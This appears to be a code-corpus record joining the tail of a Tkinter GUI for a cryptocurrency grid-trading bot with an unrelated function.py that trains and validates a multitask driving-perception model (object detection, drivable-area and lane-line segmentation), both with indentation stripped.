saveBtn = tk.Button(saveStratFrame, text="Save", padx=10, pady=5, highlightbackground=BACKGROUND, fg=BTNFG, bg=BTNBG, height=1, width=4, command=saveStrategy, relief=FLAT)
saveBtn.pack()
#tk.Label(saveStratFrame, text="This strategy is not yet implemented", bg="#482923", fg=FOREGROUND).pack()
#Define UI elements for Buy Low Sell High Strategy Frame
blStratFrame = tk.Frame(root, bg="#482923")
tk.Label(blStratFrame, text="This strategy is not yet implemented", bg="#482923", fg=FOREGROUND).pack()
#Define UI elements for GRID Strategy Frame
gridStratFrame = tk.Frame(root, bg="#182923")
tk.Label(gridStratFrame, text=" ", bg="#182923").grid(row=0, column=1)
currentPriceLabel = tk.Label(gridStratFrame, text=" Current Price (" + quotePair.get() + ")")
currentPriceLabel.config(relief=FLAT, bg="#182923", fg=FOREGROUND)
currentPriceLabel.grid(row=1, column=0, sticky="W")
currentPriceBox = tk.Text(gridStratFrame, width=12, height=1)
currentPriceBox.insert(tk.END, "2.67")
currentPriceBox.config(state="disabled", bg="#182923", fg=FOREGROUND)
currentPriceBox.grid(row=1, column=2)
tk.Label(gridStratFrame, text=" ", bg="#182923").grid(row=2, column=1)
tk.Label(gridStratFrame, text="Available Balances", bg="#182923", fg=FOREGROUND, font='Helvetica 8 bold').grid(row=3, column=1)
tradePairBalanceLabel = tk.Label(gridStratFrame, text=" Trade Balance (" + tradingPair.get() + ")")
tradePairBalanceLabel.config(relief=FLAT, bg="#182923", fg=FOREGROUND)
tradePairBalanceLabel.grid(row=4, column=0, sticky="W")
tradePairBalanceBox = tk.Text(gridStratFrame, width=12, height=1)
tradePairBalanceBox.insert(tk.END, "30000")
tradePairBalanceBox.config(state="disabled", bg="#182923", fg=FOREGROUND)
tradePairBalanceBox.grid(row=4, column=2)
quotePairBalanceLabel = tk.Label(gridStratFrame, text=" Quote Balance (" + quotePair.get() + ")")
quotePairBalanceLabel.config(relief=FLAT, bg="#182923", fg=FOREGROUND)
quotePairBalanceLabel.grid(row=5, column=0, sticky="W")
quotePairBalanceBox = tk.Text(gridStratFrame, width=12, height=1)
quotePairBalanceBox.insert(tk.END, "2.67")
quotePairBalanceBox.config(state="disabled", bg="#182923", fg=FOREGROUND)
quotePairBalanceBox.grid(row=5, column=2)
tk.Label(gridStratFrame, text=" ", bg="#182923").grid(row=6, column=1)
tk.Label(gridStratFrame, text="Grid Settings", bg="#182923", fg=FOREGROUND, font='Helvetica 8 bold').grid(row=7, column=1)
orderSizeLabel = tk.Label(gridStratFrame, text=" Order Size (" + tradingPair.get() + ")")
orderSizeLabel.config(relief=FLAT, bg="#182923", fg=FOREGROUND)
orderSizeLabel.grid(row=8, column=0, sticky="W")
orderSizeBox = tk.Text(gridStratFrame, width=12, height=1)
orderSizeBox.insert(tk.END, "0.015")
orderSizeBox.config(bg="white", fg="black")
orderSizeBox.grid(row=8, column=2)
gridDistanceLabel = tk.Label(gridStratFrame, text=" Grid Distance (" + quotePair.get() + ")")
gridDistanceLabel.config(relief=FLAT, bg="#182923", fg=FOREGROUND)
gridDistanceLabel.grid(row=9, column=0, sticky="W")
gridDistanceBox = tk.Text(gridStratFrame, width=12, height=1)
gridDistanceBox.insert(tk.END, "0.000001")
gridDistanceBox.config(bg="white", fg="black")
gridDistanceBox.grid(row=9, column=2)
gridNumberLabel = tk.Label(gridStratFrame, text="\n Number Of Grids")
gridNumberLabel.config(relief=FLAT, bg="#182923", fg=FOREGROUND)
gridNumberLabel.grid(row=10, column=0, sticky="W")
numberOfGrids = Scale(gridStratFrame, from_=2, to=500, resolution=2, orient=HORIZONTAL, bg="#182923", fg=FOREGROUND, relief=FLAT, length=210)
numberOfGrids["highlightthickness"]=0
numberOfGrids.grid(row=10, column=1, columnspan=2)
#Define Run page UI elements
tk.Label(runFrame, text="", bg=BACKGROUND).grid(row=0, column=1)
runStrategyLabel = tk.Label(runFrame, text=" Selected Trading Strategy:")
runStrategyLabel.config(relief=FLAT, bg=BACKGROUND, fg=FOREGROUND)
runStrategyLabel.grid(row=1, column=0, sticky="W")
runStrategyBox = tk.Text(runFrame, width=12, height=1)
runStrategyBox.config(state="disabled", bg=BACKGROUND, fg=FOREGROUND)
runStrategyBox.grid(row=1, column=2, sticky="W")
runTradePairLabel = tk.Label(runFrame, text=" Selected Trading Pair:")
runTradePairLabel.config(relief=FLAT, bg=BACKGROUND, fg=FOREGROUND)
runTradePairLabel.grid(row=2, column=0, sticky="W")
runTradePairBox = tk.Text(runFrame, width=12, height=1)
runTradePairBox.config(state="disabled", bg=BACKGROUND, fg=FOREGROUND)
runTradePairBox.grid(row=2, column=2, sticky="W")
quoteBalanceUseLabel = tk.Label(runFrame, text=" Amount of " + quotePair.get() + " needed:")
quoteBalanceUseLabel.config(relief=FLAT, bg=BACKGROUND, fg=FOREGROUND)
quoteBalanceUseLabel.grid(row=3, column=0, sticky="W")
quoteBalanceUseBox = tk.Text(runFrame, width=12, height=1)
quoteBalanceUseBox.config(state="disabled", bg=BACKGROUND, fg=FOREGROUND)
quoteBalanceUseBox.grid(row=3, column=2, sticky="W")
tradeBalanceUseLabel = tk.Label(runFrame, text=" Amount of " + tradingPair.get() + " needed:")
tradeBalanceUseLabel.config(relief=FLAT, bg=BACKGROUND, fg=FOREGROUND)
tradeBalanceUseLabel.grid(row=4, column=0, sticky="W")
tradeBalanceUseBox = tk.Text(runFrame, width=12, height=1)
tradeBalanceUseBox.config(state="disabled", bg=BACKGROUND, fg=FOREGROUND)
tradeBalanceUseBox.grid(row=4, column=2, sticky="W")
startBuyLabel = tk.Label(runFrame, text=" Starting Buy Price (" + quotePair.get() + ")")
startBuyLabel.config(relief=FLAT, bg=BACKGROUND, fg=FOREGROUND)
startBuyLabel.grid(row=5, column=0, sticky="W")
startBuyBox = tk.Text(runFrame, width=12, height=1)
startBuyBox.insert(tk.END, "1")
startBuyBox.config(bg="white", fg="black")
startBuyBox.grid(row=5, column=2, sticky="W")
startSellLabel = tk.Label(runFrame, text=" Starting Sell Price (" + quotePair.get() + ")")
startSellLabel.config(relief=FLAT, bg=BACKGROUND, fg=FOREGROUND)
startSellLabel.grid(row=6, column=0, sticky="W")
startSellBox = tk.Text(runFrame, width=12, height=1)
startSellBox.insert(tk.END, "1")
startSellBox.config(bg="white", fg="black")
startSellBox.grid(row=6, column=2, sticky="W")
stopBuyLabel = tk.Label(runFrame, text=" Lowest Buy Price (" + quotePair.get() + ")")
stopBuyLabel.config(relief=FLAT, bg=BACKGROUND, fg=FOREGROUND)
stopBuyLabel.grid(row=7, column=0, sticky="W")
stopBuyBox = tk.Text(runFrame, width=12, height=1)
stopBuyBox.insert(tk.END, "1")
stopBuyBox.config(bg="white", fg="black")
stopBuyBox.grid(row=7, column=2, sticky="W")
stopSellLabel = tk.Label(runFrame, text=" Highest Sell Price (" + quotePair.get() + ")")
stopSellLabel.config(relief=FLAT, bg=BACKGROUND, fg=FOREGROUND)
stopSellLabel.grid(row=8, column=0, sticky="W")
stopSellBox = tk.Text(runFrame, width=12, height=1)
stopSellBox.insert(tk.END, "1")
stopSellBox.config(bg="white", fg="black")
stopSellBox.grid(row=8, column=2, sticky="W")
runInstanceNameLabel = tk.Label(runFrame, text=" Name of Bot Instance:")
runInstanceNameLabel.config(relief=FLAT, bg=BACKGROUND, fg=FOREGROUND)
runInstanceNameLabel.grid(row=9, column=0, sticky="W")
runInstanceNameBox = tk.Text(runFrame, width=20, height=1)
runInstanceNameBox.config(state="normal", bg="white", fg="black")
runInstanceNameBox.grid(row=9, column=2, columnspan=2)
#Define bottom frame for run page start button
startRunFrame = tk.Frame(runFrame, bg=BACKGROUND)
startRunFrame.place(relwidth=FRAMEWIDTH*1.25, relheight=FRAMEHEIGHT/6.5, relx=0, rely=FRAMEPADY*7.2)
startBtn = tk.Button(startRunFrame, text="Start", padx=10, pady=5, highlightbackground=BACKGROUND, fg=BTNFG, bg=BTNBG, height=1, width=4, command=startStrategy, relief=FLAT)
startBtn.pack()
#Define Options page UI elements
tk.Label(botOptionsFrame, text=" ", bg=BACKGROUND).grid(row=0, column=1)
telegramVar = tk.IntVar()
enableTelegramChk = tk.Checkbutton(botOptionsFrame, text="Telegram", variable=telegramVar, command=telegramCheckBoxChanged)
enableTelegramChk.config(bg=BACKGROUND, fg="red")
enableTelegramChk.grid(row=1, sticky="W")
testMessage_withArg = partial(sendTelegramMessage, "This is a test!", True)
testTelegramBtn = tk.Button(botOptionsFrame, text="Test and Save", padx=35, highlightbackground=BTNFRAMEBG, fg="white", bg="#082923", height=1, width=4, command=testMessage_withArg, relief=FLAT)
testTelegramBtn.grid(row=1, column=2)
tokenLabel = tk.Label(botOptionsFrame, text=" Bot Token")
tokenLabel.config(relief=FLAT, bg=BACKGROUND, fg=FOREGROUND)
tokenLabel.grid(row=2, sticky="W")
tokenBox = tk.Entry(botOptionsFrame, width=46)
tokenBox.grid(row=2, column=2)
chatIDLabel = tk.Label(botOptionsFrame, text=" Bot Chat ID")
chatIDLabel.config(relief=FLAT, bg=BACKGROUND, fg=FOREGROUND)
chatIDLabel.grid(row=3, sticky="W")
chatIDBox = tk.Entry(botOptionsFrame, width=46)
chatIDBox.grid(row=3, column=2)
#Define About page UI elements
aboutInfo = tk.Text(aboutFrame, relief=FLAT, fg=FOREGROUND, bg=BACKGROUND, height=24, width=47)
aboutInfo.pack()
aboutInfo.insert(tk.END, "\nBot created by Omer \nTelegram: @omer259\nReddit: https://www.reddit.com/user/Omer259/")
aboutInfo.insert(tk.END, "\n\nBitcoin Donation Address: \nbc1qnjcnhcex50659vxnuhdkuzhhu4m0ewmx6p43j2")
aboutInfo.insert(tk.END, "\n\nEthereum Donation Address: \n0xE9b79A87520DFB16824d9AfC40a7d8bC1a81a753")
aboutInfo.insert(tk.END, "\n\nAll trading performed using this bot is\nat your own risk. I will not be held\nresponsible for any gains or losses caused by\nthe use of this tool")
aboutInfo.config(state="disabled")
#Define History page UI elements
scroll = Scrollbar(historyFrame)
scroll.grid(row=1, column=2, sticky="W", ipady=191.70)
tk.Label(historyFrame, text="", bg=BACKGROUND).grid(row=0, column=0)
historyTextField = tk.Text(historyFrame, bg=BACKGROUND, fg=FOREGROUND, yscrollcommand=scroll.set, width=HISTORYWIDTH, height=HISTORYHEIGHT)
historyTextField.grid(row=1, column=1, sticky="W")
scroll.config(command=historyTextField.yview)
#Define bottom frame for run page start button
cancelOrderFrame = tk.Frame(historyFrame, bg=BACKGROUND)
cancelOrderFrame.place(relwidth=FRAMEWIDTH*1.25, relheight=FRAMEHEIGHT/6.5, relx=0, rely=FRAMEPADY*7.2)
cancelOrderBtn = tk.Button(cancelOrderFrame, text="Cancel Orders and Stop", padx=10, pady=4, highlightbackground=BACKGROUND, fg=BTNFG, bg=BTNBG, height=1, width=18, command=cancelAllOrders, relief=FLAT)
cancelOrderBtn.pack()
#Setup UI elements
root.winfo_toplevel().title("Simplicity")
if os.name == "nt":
root.iconbitmap('coss.ico')
else:
print("Icons not supported in this OS")
canvas.pack()
btnFrame.place(relwidth=0.8, relheight=0.05, relx=0.1, rely=0.075)
homeFrame.place(relwidth=FRAMEWIDTH, relheight=FRAMEHEIGHT, relx=FRAMEPADX, rely=FRAMEPADY)
homeBtn.pack(in_=btnFrame, side=LEFT)
homeBtn.config(bg=BTNCLICKEDBG)
runBtn.pack(in_=btnFrame, side=LEFT)
settingsBtn.pack(in_=btnFrame, side=LEFT)
historyBtn.pack(in_=btnFrame, side=LEFT)
botOptionBtn.pack(in_=btnFrame, side=LEFT)
aboutBtn.pack(in_=btnFrame, side=LEFT)
exchangeBtn.config(state="disabled")
exchangeBtn.pack(in_=btnFrame, side=LEFT)
if telegramVar.get() == 0:
testTelegramBtn.config(state="disabled")
tokenBox.config(state="disabled")
chatIDBox.config(state="disabled")
#If telegram is enabled, alert user that bot was started
initializeBot()
#Start concurrent threads
historyRefreshThread = threading.Thread(target=historyReresh)
historyRefreshThread.daemon = True
historyRefreshThread.start()
root.mainloop()
|
function.py
|
import time
from lib.core.evaluate import ConfusionMatrix,SegmentationMetric
from lib.core.general import non_max_suppression,check_img_size,scale_coords,xyxy2xywh,xywh2xyxy,box_iou,coco80_to_coco91_class,plot_images,ap_per_class,output_to_target
from lib.utils.utils import time_synchronized
from lib.utils import plot_img_and_mask,plot_one_box,show_seg_result
import torch
from threading import Thread
import numpy as np
from PIL import Image
from torchvision import transforms
from pathlib import Path
import json
import random
import cv2
import os
import math
from torch.cuda import amp
from tqdm import tqdm
def train(cfg, train_loader, model, criterion, optimizer, scaler, epoch, num_batch, num_warmup,
writer_dict, logger, device, rank=-1):
"""
train for one epoch
Inputs:
- config: configurations
- train_loader: loder for data
- model:
- criterion: (function) calculate all the loss, return total_loss, head_losses
- writer_dict:
outputs(2,)
output[0] len:3, [1,3,32,32,85], [1,3,16,16,85], [1,3,8,8,85]
output[1] len:1, [2,256,256]
output[2] len:1, [2,256,256]
target(2,)
target[0] [1,n,5]
target[1] [2,256,256]
target[2] [2,256,256]
Returns:
None
"""
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
# switch to train mode
model.train()
start = time.time()
for i, (input, target, paths, shapes) in enumerate(train_loader):
intermediate = time.time()
#print('tims:{}'.format(intermediate-start))
num_iter = i + num_batch * (epoch - 1)
if num_iter < num_warmup:
# warm up
lf = lambda x: ((1 + math.cos(x * math.pi / cfg.TRAIN.END_EPOCH)) / 2) * \
(1 - cfg.TRAIN.LRF) + cfg.TRAIN.LRF # cosine
xi = [0, num_warmup]
# model.gr = np.interp(ni, xi, [0.0, 1.0]) # iou loss ratio (obj_loss = 1.0 or iou)
for j, x in enumerate(optimizer.param_groups):
# bias lr falls from 0.1 to lr0, all other lrs rise from 0.0 to lr0
x['lr'] = np.interp(num_iter, xi, [cfg.TRAIN.WARMUP_BIASE_LR if j == 2 else 0.0, x['initial_lr'] * lf(epoch)])
if 'momentum' in x:
x['momentum'] = np.interp(num_iter, xi, [cfg.TRAIN.WARMUP_MOMENTUM, cfg.TRAIN.MOMENTUM])
data_time.update(time.time() - start)
if not cfg.DEBUG:
input = input.to(device, non_blocking=True)
assign_target = []
for tgt in target:
assign_target.append(tgt.to(device))
target = assign_target
with amp.autocast(enabled=device.type != 'cpu'):
outputs = model(input)
total_loss, head_losses = criterion(outputs, target, shapes,model)
# print(head_losses)
# compute gradient and do update step
optimizer.zero_grad()
scaler.scale(total_loss).backward()
scaler.step(optimizer)
scaler.update()
if rank in [-1, 0]:
# measure accuracy and record loss
losses.update(total_loss.item(), input.size(0))
# _, avg_acc, cnt, pred = accuracy(output.detach().cpu().numpy(),
# target.detach().cpu().numpy())
# acc.update(avg_acc, cnt)
# measure elapsed time
batch_time.update(time.time() - start)
end = time.time()
if i % cfg.PRINT_FREQ == 0:
msg = 'Epoch: [{0}][{1}/{2}]\t' \
'Time {batch_time.val:.3f}s ({batch_time.avg:.3f}s)\t' \
'Speed {speed:.1f} samples/s\t' \
'Data {data_time.val:.3f}s ({data_time.avg:.3f}s)\t' \
'Loss {loss.val:.5f} ({loss.avg:.5f})'.format(
epoch, i, len(train_loader), batch_time=batch_time,
speed=input.size(0)/batch_time.val,
data_time=data_time, loss=losses)
logger.info(msg)
writer = writer_dict['writer']
global_steps = writer_dict['train_global_steps']
writer.add_scalar('train_loss', losses.val, global_steps)
# writer.add_scalar('train_acc', acc.val, global_steps)
writer_dict['train_global_steps'] = global_steps + 1
def validate(epoch,config, val_loader, val_dataset, model, criterion, output_dir,
tb_log_dir, writer_dict=None, logger=None, device='cpu', rank=-1):
"""
validata
Inputs:
- config: configurations
- train_loader: loder for data
- model:
- criterion: (function) calculate all the loss, return
- writer_dict:
Return:
None
"""
# setting
max_stride = 32
weights = None
save_dir = output_dir + os.path.sep + 'visualization'
if not os.path.exists(save_dir):
os.mkdir(save_dir)
# print(save_dir)
_, imgsz = [check_img_size(x, s=max_stride) for x in config.MODEL.IMAGE_SIZE] #imgsz is multiple of max_stride
batch_size = config.TRAIN.BATCH_SIZE_PER_GPU * len(config.GPUS)
test_batch_size = config.TEST.BATCH_SIZE_PER_GPU * len(config.GPUS)
training = False
is_coco = False #is coco dataset
save_conf=False # save auto-label confidences
verbose=False
save_hybrid=False
log_imgs,wandb = min(16,100), None
nc = 1
iouv = torch.linspace(0.5,0.95,10).to(device) #iou vector for mAP@0.5:0.95
niou = iouv.numel()
try:
import wandb
except ImportError:
wandb = None
log_imgs = 0
seen = 0
confusion_matrix = ConfusionMatrix(nc=model.nc) #detector confusion matrix
da_metric = SegmentationMetric(config.num_seg_class) #segment confusion matrix
ll_metric = SegmentationMetric(2) #segment confusion matrix
names = {k: v for k, v in enumerate(model.names if hasattr(model, 'names') else model.module.names)}
colors = [[random.randint(0, 255) for _ in range(3)] for _ in names]
coco91class = coco80_to_coco91_class()
s = ('%20s' + '%12s' * 6) % ('Class', 'Images', 'Targets', 'P', 'R', 'mAP@.5', 'mAP@.5:.95')
p, r, f1, mp, mr, map50, map, t_inf, t_nms = 0., 0., 0., 0., 0., 0., 0., 0., 0.
losses = AverageMeter()
da_acc_seg = AverageMeter()
da_IoU_seg = AverageMeter()
da_mIoU_seg = AverageMeter()
ll_acc_seg = AverageMeter()
ll_IoU_seg = AverageMeter()
ll_mIoU_seg = AverageMeter()
T_inf = AverageMeter()
T_nms = AverageMeter()
# switch to train mode
model.eval()
jdict, stats, ap, ap_class, wandb_images = [], [], [], [], []
for batch_i, (img, target, paths, shapes) in tqdm(enumerate(val_loader), total=len(val_loader)):
if not config.DEBUG:
img = img.to(device, non_blocking=True)
assign_target = []
for tgt in target:
assign_target.append(tgt.to(device))
target = assign_target
nb, _, height, width = img.shape #batch size, channel, height, width
with torch.no_grad():
pad_w, pad_h = shapes[0][1][1]
pad_w = int(pad_w)
pad_h = int(pad_h)
ratio = shapes[0][1][0][0]
t = time_synchronized()
det_out, da_seg_out, ll_seg_out= model(img)
t_inf = time_synchronized() - t
if batch_i > 0:
T_inf.update(t_inf/img.size(0),img.size(0))
inf_out,train_out = det_out
#driving area segment evaluation
_,da_predict=torch.max(da_seg_out, 1)
_,da_gt=torch.max(target[1], 1)
da_predict = da_predict[:, pad_h:height-pad_h, pad_w:width-pad_w]
da_gt = da_gt[:, pad_h:height-pad_h, pad_w:width-pad_w]
da_metric.reset()
da_metric.addBatch(da_predict.cpu(), da_gt.cpu())
da_acc = da_metric.pixelAccuracy()
da_IoU = da_metric.IntersectionOverUnion()
da_mIoU = da_metric.meanIntersectionOverUnion()
da_acc_seg.update(da_acc,img.size(0))
da_IoU_seg.update(da_IoU,img.size(0))
da_mIoU_seg.update(da_mIoU,img.size(0))
#lane line segment evaluation
_,ll_predict=torch.max(ll_seg_out, 1)
_,ll_gt=torch.max(target[2], 1)
ll_predict = ll_predict[:, pad_h:height-pad_h, pad_w:width-pad_w]
ll_gt = ll_gt[:, pad_h:height-pad_h, pad_w:width-pad_w]
ll_metric.reset()
ll_metric.addBatch(ll_predict.cpu(), ll_gt.cpu())
ll_acc = ll_metric.lineAccuracy()
ll_IoU = ll_metric.IntersectionOverUnion()
ll_mIoU = ll_metric.meanIntersectionOverUnion()
ll_acc_seg.update(ll_acc,img.size(0))
ll_IoU_seg.update(ll_IoU,img.size(0))
ll_mIoU_seg.update(ll_mIoU,img.size(0))
total_loss, head_losses = criterion((train_out,da_seg_out, ll_seg_out), target, shapes,model) #Compute loss
losses.update(total_loss.item(), img.size(0))
#NMS
t = time_synchronized()
target[0][:, 2:] *= torch.Tensor([width, height, width, height]).to(device) # to pixels
lb = [target[0][target[0][:, 0] == i, 1:] for i in range(nb)] if save_hybrid else [] # for autolabelling
output = non_max_suppression(inf_out, conf_thres= config.TEST.NMS_CONF_THRESHOLD, iou_thres=config.TEST.NMS_IOU_THRESHOLD, labels=lb)
#output = non_max_suppression(inf_out, conf_thres=0.001, iou_thres=0.6)
#output = non_max_suppression(inf_out, conf_thres=config.TEST.NMS_CONF_THRES, iou_thres=config.TEST.NMS_IOU_THRES)
t_nms = time_synchronized() - t
if batch_i > 0:
T_nms.update(t_nms/img.size(0),img.size(0))
if config.TEST.PLOTS:
if batch_i == 0:
for i in range(test_batch_size):
if i>=len(paths): # 后续需要删除
break
img_test = cv2.imread(paths[i])
da_seg_mask = da_seg_out[i][:, pad_h:height-pad_h, pad_w:width-pad_w].unsqueeze(0)
da_seg_mask = torch.nn.functional.interpolate(da_seg_mask, scale_factor=int(1/ratio), mode='bilinear')
_, da_seg_mask = torch.max(da_seg_mask, 1)
da_gt_mask = target[1][i][:, pad_h:height-pad_h, pad_w:width-pad_w].unsqueeze(0)
da_gt_mask = torch.nn.functional.interpolate(da_gt_mask, scale_factor=int(1/ratio), mode='bilinear')
_, da_gt_mask = torch.max(da_gt_mask, 1)
da_seg_mask = da_seg_mask.int().squeeze().cpu().numpy()
da_gt_mask = da_gt_mask.int().squeeze().cpu().numpy()
# seg_mask = seg_mask > 0.5
# plot_img_and_mask(img_test, seg_mask, i,epoch,save_dir)
img_test1 = img_test.copy()
_ = show_seg_result(img_test, da_seg_mask, i,epoch,save_dir)
_ = show_seg_result(img_test1, da_gt_mask, i, epoch, save_dir, is_gt=True)
img_ll = cv2.imread(paths[i])
ll_seg_mask = ll_seg_out[i][:, pad_h:height-pad_h, pad_w:width-pad_w].unsqueeze(0)
ll_seg_mask = torch.nn.functional.interpolate(ll_seg_mask, scale_factor=int(1/ratio), mode='bilinear')
_, ll_seg_mask = torch.max(ll_seg_mask, 1)
ll_gt_mask = target[2][i][:, pad_h:height-pad_h, pad_w:width-pad_w].unsqueeze(0)
ll_gt_mask = torch.nn.functional.interpolate(ll_gt_mask, scale_factor=int(1/ratio), mode='bilinear')
_, ll_gt_mask = torch.max(ll_gt_mask, 1)
ll_seg_mask = ll_seg_mask.int().squeeze().cpu().numpy()
ll_gt_mask = ll_gt_mask.int().squeeze().cpu().numpy()
# seg_mask = seg_mask > 0.5
# plot_img_and_mask(img_test, seg_mask, i,epoch,save_dir)
img_ll1 = img_ll.copy()
_ = show_seg_result(img_ll, ll_seg_mask, i,epoch,save_dir, is_ll=True)
_ = show_seg_result(img_ll1, ll_gt_mask, i, epoch, save_dir, is_ll=True, is_gt=True)
img_det = cv2.imread(paths[i])
img_gt = img_det.copy()
det = output[i].clone()
if len(det):
det[:,:4] = scale_coords(img[i].shape[1:],det[:,:4],img_det.shape).round()
for *xyxy,conf,cls in reversed(det):
#print(cls)
label='bottle'
c='0.93'
label_det_pred = f'{label} {c}'
plot_one_box(xyxy, img_det , label=label_det_pred, color=colors[int(cls)], line_thickness=3)
if epoch % 1==0:
cv2.imwrite(save_dir+"/batch_{}_{}_det_pred.png".format(epoch,i),img_det)
labels = target[0][target[0][:, 0] == i, 1:]
# print(labels)
labels[:,1:5]=xywh2xyxy(labels[:,1:5])
if len(labels):
labels[:,1:5]=scale_coords(img[i].shape[1:],labels[:,1:5],img_gt.shape).round()
for cls,x1,y1,x2,y2 in labels:
#print(names)
#print(cls)
label='bottle'
label_det_gt = f'{label}'
xyxy = (x1,y1,x2,y2)
plot_one_box(xyxy, img_gt , label=label_det_gt, color=colors[int(cls)], line_thickness=3)
if epoch % 1==0:
cv2.imwrite(save_dir+"/batch_{}_{}_det_gt.png".format(epoch,i),img_gt)
# Statistics per image
# output([xyxy,conf,cls])
# target[0] ([img_id,cls,xyxy])
for si, pred in enumerate(output):
labels = target[0][target[0][:, 0] == si, 1:] #all object in one image
nl = len(labels) # num of object
tcls = labels[:, 0].tolist() if nl else [] # target class
path = Path(paths[si])
seen += 1
if len(pred) == 0:
if nl:
stats.append((torch.zeros(0, niou, dtype=torch.bool), torch.Tensor(), torch.Tensor(), tcls))
continue
# Predictions
predn = pred.clone()
scale_coords(img[si].shape[1:], predn[:, :4], shapes[si][0], shapes[si][1]) # native-space pred
# Append to text file
if config.TEST.SAVE_TXT:
gn = torch.tensor(shapes[si][0])[[1, 0, 1, 0]] # normalization gain whwh
for *xyxy, conf, cls in predn.tolist():
xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist() # normalized xywh
line = (cls, *xywh, conf) if save_conf else (cls, *xywh) # label format
with open(save_dir / 'labels' / (path.stem + '.txt'), 'a') as f:
f.write(('%g ' * len(line)).rstrip() % line + '\n')
# W&B logging
if config.TEST.PLOTS and len(wandb_images) < log_imgs:
box_data = [{"position": {"minX": xyxy[0], "minY": xyxy[1], "maxX": xyxy[2], "maxY": xyxy[3]},
"class_id": int(cls),
"box_caption": "%s %.3f" % (names[cls], conf),
"scores": {"class_score": conf},
"domain": "pixel"} for *xyxy, conf, cls in pred.tolist()]
boxes = {"predictions": {"box_data": box_data, "class_labels": names}} # inference-space
wandb_images.append(wandb.Image(img[si], boxes=boxes, caption=path.name))
# Append to pycocotools JSON dictionary
if config.TEST.SAVE_JSON:
# [{"image_id": 42, "category_id": 18, "bbox": [258.15, 41.29, 348.26, 243.78], "score": 0.236}, ...
image_id = int(path.stem) if path.stem.isnumeric() else path.stem
box = xyxy2xywh(predn[:, :4]) # xywh
box[:, :2] -= box[:, 2:] / 2 # xy center to top-left corner
for p, b in zip(pred.tolist(), box.tolist()):
jdict.append({'image_id': image_id,
'category_id': coco91class[int(p[5])] if is_coco else int(p[5]),
'bbox': [round(x, 3) for x in b],
'score': round(p[4], 5)})
# Assign all predictions as incorrect
correct = torch.zeros(pred.shape[0], niou, dtype=torch.bool, device=device)
if nl:
detected = [] # target indices
tcls_tensor = labels[:, 0]
# target boxes
tbox = xywh2xyxy(labels[:, 1:5])
scale_coords(img[si].shape[1:], tbox, shapes[si][0], shapes[si][1]) # native-space labels
if config.TEST.PLOTS:
confusion_matrix.process_batch(pred, torch.cat((labels[:, 0:1], tbox), 1))
# Per target class
for cls in torch.unique(tcls_tensor):
ti = (cls == tcls_tensor).nonzero(as_tuple=False).view(-1) # prediction indices
pi = (cls == pred[:, 5]).nonzero(as_tuple=False).view(-1) # target indices
# Search for detections
if pi.shape[0]:
# Prediction to target ious
# n*m n:pred m:label
ious, i = box_iou(predn[pi, :4], tbox[ti]).max(1) # best ious, indices
# Append detections
detected_set = set()
for j in (ious > iouv[0]).nonzero(as_tuple=False):
d = ti[i[j]] # detected target
if d.item() not in detected_set:
detected_set.add(d.item())
detected.append(d)
correct[pi[j]] = ious[j] > iouv # iou_thres is 1xn
if len(detected) == nl: # all targets already located in image
break
# Append statistics (correct, conf, pcls, tcls)
stats.append((correct.cpu(), pred[:, 4].cpu(), pred[:, 5].cpu(), tcls))
if config.TEST.PLOTS and batch_i < 3:
f = save_dir +'/'+ f'test_batch{batch_i}_labels.jpg' # labels
#Thread(target=plot_images, args=(img, target[0], paths, f, names), daemon=True).start()
f = save_dir +'/'+ f'test_batch{batch_i}_pred.jpg' # predictions
#Thread(target=plot_images, args=(img, output_to_target(output), paths, f, names), daemon=True).start()
# Compute statistics
# stats : [[all_img_correct]...[all_img_tcls]]
stats = [np.concatenate(x, 0) for x in zip(*stats)] # to numpy zip(*) :unzip
map70 = None
map75 = None
if len(stats) and stats[0].any():
p, r, ap, f1, ap_class = ap_per_class(*stats, plot=False, save_dir=save_dir, names=names)
ap50, ap70, ap75,ap = ap[:, 0], ap[:,4], ap[:,5],ap.mean(1) # [P, R, AP@0.5, AP@0.5:0.95]
mp, mr, map50, map70, map75, map = p.mean(), r.mean(), ap50.mean(), ap70.mean(),ap75.mean(),ap.mean()
nt = np.bincount(stats[3].astype(np.int64), minlength=nc) # number of targets per class
else:
nt = torch.zeros(1)
# Print results
pf = '%20s' + '%12.3g' * 6 # print format
print(pf % ('all', seen, nt.sum(), mp, mr, map50, map))
#print(map70)
#print(map75)
# Print results per class
if (verbose or (nc <= 20 and not training)) and nc > 1 and len(stats):
for i, c in enumerate(ap_class):
print(pf % (names[c], seen, nt[c], p[i], r[i], ap50[i], ap[i]))
# Print speeds
t = tuple(x / seen * 1E3 for x in (t_inf, t_nms, t_inf + t_nms)) + (imgsz, imgsz, batch_size) # tuple
if not training:
print('Speed: %.1f/%.1f/%.1f ms inference/NMS/total per %gx%g image at batch-size %g' % t)
# Plots
if config.TEST.PLOTS:
confusion_matrix.plot(save_dir=save_dir, names=list(names.values()))
if wandb and wandb.run:
wandb.log({"Images": wandb_images})
wandb.log({"Validation": [wandb.Image(str(f), caption=f.name) for f in sorted(save_dir.glob('test*.jpg'))]})
# Save JSON
if config.TEST.SAVE_JSON and len(jdict):
w = Path(weights[0] if isinstance(weights, list) else weights).stem if weights is not None else '' # weights
anno_json = '../coco/annotations/instances_val2017.json' # annotations json
pred_json = str(save_dir / f"{w}_predictions.json") # predictions json
print('\nEvaluating pycocotools mAP... saving %s...' % pred_json)
with open(pred_json, 'w') as f:
json.dump(jdict, f)
try: # https://github.com/cocodataset/cocoapi/blob/master/PythonAPI/pycocoEvalDemo.ipynb
from pycocotools.coco import COCO
from pycocotools.cocoeval import COCOeval
anno = COCO(anno_json) # init annotations api
pred = anno.loadRes(pred_json) # init predictions api
eval = COCOeval(anno, pred, 'bbox')
if is_coco:
eval.params.imgIds = [int(Path(x).stem) for x in val_loader.dataset.img_files] # image IDs to evaluate
eval.evaluate()
eval.accumulate()
eval.summarize()
map, map50 = eval.stats[:2] # update results (mAP@0.5:0.95, mAP@0.5)
except Exception as e:
print(f'pycocotools unable to run: {e}')
# Return results
if not training:
s = f"\n{len(list(save_dir.glob('labels/*.txt')))} labels saved to {save_dir / 'labels'}" if config.TEST.SAVE_TXT else ''
print(f"Results saved to {save_dir}{s}")
model.float() # for training
maps = np.zeros(nc) + map
for i, c in enumerate(ap_class):
maps[c] = ap[i]
da_segment_result = (da_acc_seg.avg,da_IoU_seg.avg,da_mIoU_seg.avg)
